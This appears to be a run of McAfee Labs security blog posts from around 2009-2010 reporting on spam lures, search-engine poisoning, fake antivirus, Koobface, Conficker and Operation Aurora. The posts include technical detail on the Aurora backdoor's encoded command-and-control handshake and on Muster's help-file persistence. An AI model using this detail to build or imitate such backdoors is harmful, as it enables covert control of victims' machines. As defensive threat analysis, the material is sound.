Today has been quite a busy day for scammers. We at McAfee Labs have been tracking a global scam/spam run that targets Facebook users. The lure used in the run is a familiar one:

Facebook Password Reset Confirmation! Customer Support.

The email looks like the following:

The activity on this particular scam run has been global from the beginning, and thanks to our Artemis “cloud” technology we have dealt with it very efficiently. The malware in the attachment is pretty much what one would expect: downloaders, password-stealing Trojan, fake-AV, or bot stuff, depending on which one you got. Check out the Artemis map of this malware:

To give you an idea of the scope of the run, it reached as high as No. 6 (!) on our Global Virus Map’s Top 10, which tracks consumer detections worldwide. It even accounts for as much as 10 percent of the infected email that our managed email SaaS unit is seeing. From the looks of the spams themselves they may be associated with the Cutwail or Rustock botnets, but that analysis is still ongoing.

As we had previously discussed in our 2010 Threat Predictions, social networking sites will continue to be a favorite social engineering lure for cybercriminals to distribute malware. Make sure you are protected and educated.

You can submit information about any fake Facebook email to the Facebook Security Team. Facebook also has a great security page that I recommend to all Facebook users.

We frequently read stories about spammers who can circumvent CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) authentication. Using bot-infected machines, they can create a vast number of random e-mail accounts for spamming purposes.

This week, a federal judge in Newark, New Jersey, revealed the latest use of a botnet-like network with a CAPTCHA breaker. In this case, the computers overseen by the defendants were used to buy seats for high-profile concerts and sports events from ticket sellers’ websites. The defendents later allegedly resold the tickets on Internet at much higher prices.

According to the indictment, the distributed software was developed by some programmer accomplices in Bulgaria. The application defeated security measures designed to limit individual ticket purchases and snatched up the best ones. Unlike botnets we frequently encounter, this one was set up on dedicated computers designed solely for this purpose. The botnet purchased more than 1.5 million premium tickets to events from late 2002 to about January 2009, making a profit estimated at $28.9 million.

The employees, contractors, and defendants behind this rip-off are known as the “Wiseguys,” based on the name of the Nevada corporation they created (Wiseguy Tickets, Inc.). The Wiseguys botnet was a nationwide network of computers used to purchase thousands of tickets within minutes. The botnet:

• Monitored the online ticket vendors’ websites for the exact moment that tickets to popular events went on sale
• Opened thousands of connections at the instant that tickets went on sale
• Defeated the CAPTCHA challenge in a fraction of a second (a human needs five to ten seconds), thus speeding ahead of legitimate buyers
• Supervised by Wiseguys employees, prepared lists of hundreds of the best tickets almost instantly
• Filled in all the fields necessary to complete the purchases, including customer credit card information and false e-mail addresses

The indictment explains how the Wiseguys took advantage of many popular events such as the BCS college football championship game, the Barbara Streisand concert in Chicago, Hannah Montana concerts in New Jersey, and the 2008 Bruce Springsteen Tour. For this last event, the botnet was able to purchase approximately 11,800 tickets.

One of their last crimes occurred in January 2009, according to the indictment, when the botnet impersonated 1,000 individual ticket buyers for the New York Giants vs. Philadelphia Eagles NFL playoff game at Giants Stadium in East Rutherford, New Jersey.

This affair is a perfect example of a targeted attack (here against the online ticket vendors) using malware that is not widespread. The affair demonstrates how important it is for administrators to keep watch over their networks and watch for even the slightest anomalies.

Check out this video for CNN’s coverage.

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

For this search three of the top five results lead to malicious links (not good). The next search moved onto Olympics-themed screensavers (which historically are heavily abused):

In this case two of the 10 results on the first page lead to malicious websites–actually less than I expected. But look what happened when I added the word download to my search:

In this case five of the 10 results on the first page were now malicious or questionable. Quite interesting. When I added an -s to download my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

Just shy of half the results on the first page lead to some very nasty sites indeed for wallpaper. Next I also searched for themed screensavers:

Again, just about half the results on the first page lead to malicious links. That’s not surprising but certainly not good. Just remember this trend: news, sporting events, and holidays are common abuse targets for cybercriminals. Be suspicious when searching for info in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday–such as Valentine’s Day–approaches and malware authors and cybercriminals ready for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

Even Rolex watches on Valentine’s Day are not safe:

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats are evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

The other day, I came across a malware that attempts to hide its infection not in that technical but in the very unique way.

“Muster” is a family of backdoor which has been using help files for hiding themselves. The help files or “.hlp” files are data files designed to be viewed with Microsoft WinHelp browser for providing online helps for applications users. Earlier variants of “Muster” drop encoded copies of main backdoor components in filenames with the extension “.hlp”. These “.hlp”files are later decrypted with Microsoft CryptAPI with hardcoded keys and executed by loaders.

A recent variant “Muster.e” is using help files in a different way. Once installed, it infects to an existing help file called “imepaden.hlp” which is the one of the help files for Microsoft IME. Of course, this infected help file still can be viewed with WinHelp browser in the same manner as the original help file, and users hardly find its infection from the view.

How this is activated upon each machine boot? Muster.e also drops a sys file that is loaded as a service upon reboot. This sys file is responsible for extracting the appended executable file from the help file and copy it to a standalone executable file called “upgraderUI.exe”with the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run AutoPatch, which makes users to believe this is something related to a system update tool. On top of this, the malware authors also have crafted the sys file for deceiving users.

As you can see, this sys file has names like “MyDDKDevice” and “HelloDDK”, and is designed to dump many debug messages and which looks to be a typical test sys file compiled from a sample code in the layman’s guidebook for learning device driver programming. In fact, if you search on these words, you will see lots of web pages describing device driver programming. It is not that easy to tell why authors have created a sys file this way. However, regarding the efforts on hiding backdoors in help files, I don’t think bad guys have bored with creating a sys file from the scratch but more like tricking users that this is innocent.

One of the likely scenarios planned by the malware authors is this. Victims may notice the existences of this suspicious file UpgraderUI.exe and the registry key, and then they will delete the file and registry key. Then they would think they have removed this backdoor successfully. Even if they find the file and the registry key is coming back again and again on each reboot, users will not able to find any other suspicious files. Users will never imagine that the sys file is malicious or the infection to the file imepaden.hlp.

I don’t know if these deception techniques really work, however you might want to add help files to your checklist if your machine is suspected to be infected. McAfee VirusScan with DATs 5861 or later detects and cleans those infected help files and backdoor files.

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit.  A few days ago exploit code was made public.  Since then malware authors have been customizing the exploits payload to install their own malicious creations.  Much of the field telemetry we’ve been receiving has been coming from McAfee users in China visiting websites in China.  Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple javascripts and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org.  A common filename is ie.html, which references what.jpg, which contains part of the exploit code (and not a JPEG image).  Some payloads seen download files named down.css and log.css, which are malware executables.  Those executables contain functionality to download other malware, including:

• Artemis!629E2332CFDA – Generic PWS.y!bsk
• Artemis!78043EBA321B – PWS-Mmorpg!la
• Artemis!911BCF95C022 – PWS-OnlineGames.gx
• Generic Downloader.x!coe
• Generic Dropper!byp
• Generic PWS.y!bsk
• PWS-Mmorpg!la
• Suspect-02!50CB7D4BB04E – Generic Dropper.hi
• Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
• Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
• Suspect-26!B01B63F88994 – PWS-Mmorpg!la

Given that exploit code is readily available, this is likely the tip-of-the tip of the iceberg in terms of the domains and malware we are likely to see over the next few weeks (and we can expect to see new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computer World reported that private exploits were created which exploit Internet Explorer 7 & 8, but that those exploits would remain private.  Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that they would release an out of cycle patch for this vulnerability.  McAfee Labs advices those tempted to install an unofficial patch to think twice before doing so as malware and adware often arrive under the guise of such a “fix”.

As we know, the recent Operation Aurora has been making waves due to a highly organized attack targeting companies such as Google, Adobe and other high profile companies. A security breach due to a vulnerability in Microsoft’s Internet Explorer, CVE-2010-0249, caused remote code execution leading to download of malware on compromised systems.

At McAfee Labs, researchers have been working around the clock across regions to delve deeper into the inner workings of this attack in an effort to educate and assist customers in its mitigation. In this blog we discuss the communication protocol being utilized by Aurora which depicts how organized and technical this attack is.

We also discuss the backdoor components of Aurora which would allow the hackers to take complete control of the victim’s machine. The backdoor components, which were dropped in the system by Roarur.dr after the successful exploitation by Exploit-Comele, are composed of several variants of Roarur.dll.

All samples used highly obfuscated code, with small pieces of code connected via jumps and calls, and separated by NOPs:

One thing in common between these DLL variants is the protocol used to communicate with the command & control server. Let’s take a look at how this protocol works.

After the initialization of the malware DLL, a connection is made to the command and control (C&C) server. The connection is made on port 443 which is usually used by the HTTPS protocol, encrypted with SSL. During analysis, we noticed that the employed protocol on this port was not the standard SSL protocol, but a custom encrypted protocol.

The backdoor client initiates the protocol by issuing a packet which always has the same first 20 bytes:

[ ff ff ff ff ff ff 00 00 fe ff ff ff ff ff ff ff ff ff 88 ff ]

After the initiator handshake, the protocol uses a 20 byte packet as header for all communication that follows. All data sent from client to server is encoded with a logical NOT, and all data received from server is XOR encoded with 0xCC. So the first reply from server would be:

[ CC CC CC CC CD CC CC CC CD CC CC CC CC CC CC CC XX XX XX XX ]

(where XX can represent any byte)

The handshake is followed by information gathering. The backdoor gathers the following information from the victim’s machine and sends it back to the server:

• Content of HARDWARE\DESCRIPTION\System\CentralProcessor\MHz registry key
• Service pack name
• Machine name
• OS Version

At the time the operation was made public by Google, the control servers were offline, hence we don’t have access to the actual communication. However after understanding the protocol and the expected commands at the client end, we were able to set up a fake environment allowing us to initiate commands to the client. In this way we were able to force the malware to behave in a way we requested.

Based on this, we found that the structure of the header is the following:

Commands can have any value between 0×02 and 0×14, which gives the hacker 18 possible commands. But these commands can be extended by the use of the parameters, which change the behavior of the command executed:

One interesting note on the protocol is the fact that each client uses a different encryption key to obfuscate the data sent to server. It makes a call to GetTickCount() to generate a random encryption key which is sent as part of the header in the outgoing packet. This key is used to encrypt the data between client and server afterwards. Indeed an interesting approach.

The “extra data” part of the packet can contain any information the hacker wants. Based on the commands executed, this could be which drives/files the user has on the system, information to install a new service, or even a file to drop on the system.

The transmission of this extra data is made in two steps:

• The backdoor receive the header, decrypts it with XOR 0xCC and gets the command
• The command is executed
• Based on the command, if there is extra data to receive, get the extra data size and check if the encryption key is the same as the one sent before
• Apply a XOR 0xCC decryption to the Extra Data.
• Decrypt with given encryption key

We believe this is how the file Acelpvc.dll was dropped on the system. This is another backdoor component which can be installed as a service and receive two parameters: IP and port.

Acelpvc.dll, once loaded, opens a connection on this server:port using the same encrypted protocol. This way, the hackers could make the victim’s computer connect to another server and guarantee his access to the system even if his connection is cut.

As you can see this attack involved very advanced methods with several pieces of malware working in concert to give the attackers full control of the infected system, at the same time it attempts to disguise itself as a common connection to a secure website. This way the attackers were able to covertly gather all the information they wanted without being discovered.

Hopefully this brief will provide users with a good basic understanding of the custom backdoor protocol used during Operation Aurora. Stay tuned for more information on Aurora as McAfee dissects it 

Update Jan 19, 2010 (product coverage update)
McAfee Network Security Platform: The UDS release of January 19 contains the signature “UDS-BACKDOOR: Operation Aurora Channel Detected” to detect this backdoor.

In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge.  Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc; it makes sense that attackers would try to incorporate an unpatched Internet Explorer vulnerability and Haiti-related web content.

I figured a good place to look for attackers is by Googling the most popular search terms of the day.  It’s been a while since I last researched search engine manipulation.  As expected it was quite easy to find high ranking search results for Haiti-related terms; the vast majority led to rogue antivirus malicious sites, similar to earlier blogs.  I did not come across any sites exploiting the recent zero-day IE vulnerability.  However, I did come across plenty of Clickjacking, but not just Clickjacking, they have incorporated Google Trends, Digg.com, Blackhat SEO, and Clickfraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user following the link on Digg.com, they are taken to a generic website, enticing them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note the sites in the image below are potential victims here too as they could be charged for “unwanted clicks” on their ads).

This form of Clickfraud can generate money for the attacker.  If this fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.

The web server shows many search terms seeded this way, including several related to Haiti:

• haiti-breaking-news
• haiti-earthquake-damage
• haiti-earthquake-info
• haiti-earthquake-relief
• haiti-earthquake-time
• haiti-pact-with-the-devil
• haiti-pat-robertson
• haiti-relief-effort
• haiti-support
• haitian-earthquake-relief
• haitian-relief-efforts
• hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is release; a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’,  on the McAfee’s Security Insight blog  The purpose of this blog is to answer questions about this particular attack; fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer;  Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, or opening an email attachment, etc).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations to be vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are affected.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

• The top 25 men and women that were spammed
• Chinese pharma spam isn’t going away – in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
• “Free-hosting” websites to provide spam URLs has become a major target for spammers

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

Unlike the first malware authors who wrote viruses seeking fame through destruction, their motivation has changed to financial gain.

Nevertheless, there are still the ones out there who share the first authors’ intent. I was analysing a simple Trojan today and saw the following message:

It is not uncommon for malware authors to leave messages in their code for Researchers to read.

This one did bring a smile to my face, so he was rewarded by it being named BackDoor-EKD which is an increment of one from BackDoor-EKC

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla Seamonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s Trusted Source blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:

Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:

Remember to update your McAfee products to ensure you are protected from these threats.

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (”data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix ”FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released a tool for sandboxing .swf files to prevent a class of Flash exploits called Blitzableiter (”lightning rod”). His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you.

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

• Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
• Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
• Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
• HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertantly left off the document. Thanks, Pedro!)

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now are serving a different purpose.

When users go to these these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Stay updated and safe over the holidays!

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

This lead to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

In short order I also received two more IMs. The first was a video (sound familiar???):

Which lead to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

This lead to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

I contacted my friend (who was certainly NOT the sending IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sights. This has been a well established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these lead to the expected results:

The SiteAdvisor warning page on it is pretty clear on its intentions:

Some of the search phrases that are yielding very questionable results are:

Brittany Murphy dies
Brittany Murphy dead
Brittany Murphy husband
Brittany Murphy death hoax
Ashton Kutcher Brittany Murphy
Brittany Murphy 8 mile
Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

• A variant: First appeared 21 November 2008
• B variant: First appeared 29 December 2008
• C variant: First appeared 20 February 2009
• D variant: First appeared 4 March 2009
• E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Window’s Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under the generic top-level domain standard. Then infected machines attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide were infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IP in their network space:

• 1086 for the Russian Federation (RU)
• 597 for the United States (US)
• 422 for Ukraine (UA)
• 271 for Romania (RO)
• 244 for Brazil (BR)
• 243 for Republic of Korea (KR)
• 184 for Poland (PL)
• 166 for Bulgaria (BG)
• 147 for Europe (EU)
• 129 for Indonesia (ID)
• 113 for Japan (JP)
• 95 for China (CN)
• 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for causing cyberwarfare that could disrupt not just countries, but the Internet itself.

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

